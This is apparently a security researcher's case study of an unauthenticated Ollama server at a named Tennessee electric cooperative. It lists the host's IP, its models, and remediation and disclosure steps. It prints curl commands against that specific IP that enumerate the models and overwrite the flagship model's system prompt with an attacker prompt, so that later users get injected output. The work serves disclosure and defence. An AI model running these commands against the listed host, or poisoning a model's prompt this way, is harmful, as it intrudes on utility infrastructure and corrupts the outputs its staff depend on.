Most recent
navigate open esc close Corpus index built 2026-06-07 23:58 UTC

← All engagement records

Case study May 1, 2026

Meriwether Lewis Electric Cooperative: 235B-Parameter Model on Unauthenticated Ollama

Sector
Critical Infrastructure

NuClide Research · 2026-05-01


Summary

Meriwether Lewis Electric Cooperative (rural electric utility, Tennessee) running a 235-billion-parameter Ollama instance with raw API port publicly accessible. No authentication. The model inventory, including a 132GB MoE model, indicates significant dedicated GPU infrastructure deployed without basic network security controls.


Infrastructure

FieldValue
IP66.220.170.90
rDNS66.220.170.90.mlec.com
OrgMeriwether Lewis Electric Cooperative
SectorCritical Infrastructure, Electric Utility
CountryUS, Tennessee
Open ports11434 (Ollama, public)

Models

ModelSizeNotes
qwen3:235b-a22b132 GB235B MoE model, flagship deployment
qwen3-vl:32b19 GBVision-language model
qwen2.5:32b18 GBLocal
llama3.3:70b-instruct-q4_K_M39 GBLocal

Total local model storage: ~208 GB


Findings

F1: Unauthenticated Ollama API (CRITICAL)

Port 11434 publicly accessible on critical infrastructure operator’s network. No authentication.

curl http://66.220.170.90:11434/api/tags

All four models enumerable and injectable without credentials.

F2: Model Injection on Critical Infrastructure (CRITICAL)

CVE-2025-63389 applies to this instance:

curl -X POST http://66.220.170.90:11434/api/create \
  -d '{"model":"qwen3:235b-a22b","from":"qwen3:235b-a22b","system":"[attacker prompt]"}'

If this model is used for operational decision support or staff workflows, injected instructions affect output on every future invocation.

F3: 235B MoE Model Accessible to Unauthenticated Actors (HIGH)

qwen3:235b-a22b (132GB) represents significant compute accessible without restriction. Any actor can run free inference at the utility’s hardware cost. The vision-language model (qwen3-vl:32b) could process operational imagery if accessible in the workflow.


Impact

Electric cooperative AI deployment on utility infrastructure with no access control. Classification: Critical Infrastructure under CISA ICS-CERT scope (Energy Sector).


Remediation

OLLAMA_HOST=127.0.0.1:11434
systemctl restart ollama

Firewall rule at network perimeter blocking inbound TCP 11434 as defense-in-depth.


Disclosure

  • Discovered: 2026-05-01
  • Status: Pending, CERT/CC VINCE submission recommended (covers class-wide CVE-2025-63389)
  • Escalation path: CISA ICS-CERT, E-ISAC (Energy sector)